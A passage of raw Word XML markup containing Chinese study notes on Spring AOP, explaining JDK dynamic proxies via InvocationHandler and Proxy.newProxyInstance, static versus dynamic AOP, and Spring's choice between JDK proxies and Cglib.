        </w:rPr>
        <w:t>里边有一个属性是目标类，在</w:t>
      </w:r>
      <w:r w:rsidRPr="00B403FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>invoke</w:t>
      </w:r>
      <w:r w:rsidRPr="00B403FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法中</w:t>
      </w:r>
      <w:r w:rsidRPr="00B403FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>利用反射</w:t>
      </w:r>
      <w:r w:rsidRPr="00B403FA">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>执行目标类的方法，并在其前后加入日志的方法</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。然后将目标类的类加载器，目标类实现的接口和实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>InvicationHandler</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>接口的方法传入到</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Proxy</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>newProxyInstance</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法中。这样就实现了</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="0052553A">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="微软雅黑" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。这样的话我们就可以在不修改任何代码的情况下在任何目标类中都可以动态的加入记日志的功能。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRPr="0052553A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        // </w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>创建代理实例</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>        Saying proxy = (Saying) Proxy.newProxyInstance(</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                target.getClass().getClassLoader(),//</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>目标类的类加载器</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                target.getClass().getInterfaces(),//</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>目标类的接口</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:br/>
        <w:t>                handler);//</w:t>
      </w:r>
      <w:r w:rsidRPr="000A3286">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:cs="Tahoma"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>横切类</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的实现方式有两种：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>框架在编译阶段，就对目标类进行修改，得到的</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>文件已经是被修改过的。生成静态的</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>代理类（生成</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>*.class</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>文件已经被改掉了，需要使用特定的编译器）。以</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AspectJ</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>为代表</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> —— </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>静态</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>框架。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>框架在运行阶段，动态生成</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>代理（在内存中动态地生成</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>代理类），</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>以实现对目标对象的增强。它不需要特殊的编译器。以</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Spring AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>为代表。</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">—— </w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>动态</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AOP</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE32DF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>框架。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">.1  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理模式</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>借助于</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>的支持，可以在运行时动态生成代理类（</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>代理角色</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>），我们就可以解决上述代理模式中代码膨胀的问题，使用了动态代理后，</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>代理角色</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>将不用手动生成，而由</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>JVM</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>在运行时，通过指定类加载器、接口数组、调用处理程序这</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>个参数来动态生成。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00766624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Spring</w:t>
      </w:r>
      <w:r w:rsidRPr="00766624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>提供了两种方式来生成代理对象</w:t>
      </w:r>
      <w:r w:rsidRPr="00766624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>: JDKProxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00766624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00766624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Cglib</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>，具体使用哪种方式生成由</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AopProxyFactory</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>根据</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>AdvisedSupport</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>对象的配置来决定。</w:t>
      </w:r>
      <w:r w:rsidRPr="00766624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>默认的策略是如果目标类是接口，则使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00766624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>JDK</w:t>
      </w:r>
      <w:r w:rsidRPr="00766624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>动态代理技术，否则使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00766624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Cglib</w:t>
      </w:r>
      <w:r w:rsidRPr="00766624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>来生成代理</w:t>
      </w:r>
      <w:r w:rsidRPr="004141C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000E477A" w:rsidRDefault="000E477A" w:rsidP="000E477A">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="258" w:lineRule="atLeast"/>
        <w:ind w:firstLine="720"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ClassLoader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>用于加载代理类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Loader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通常这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Loader</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和被代理的类是同一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
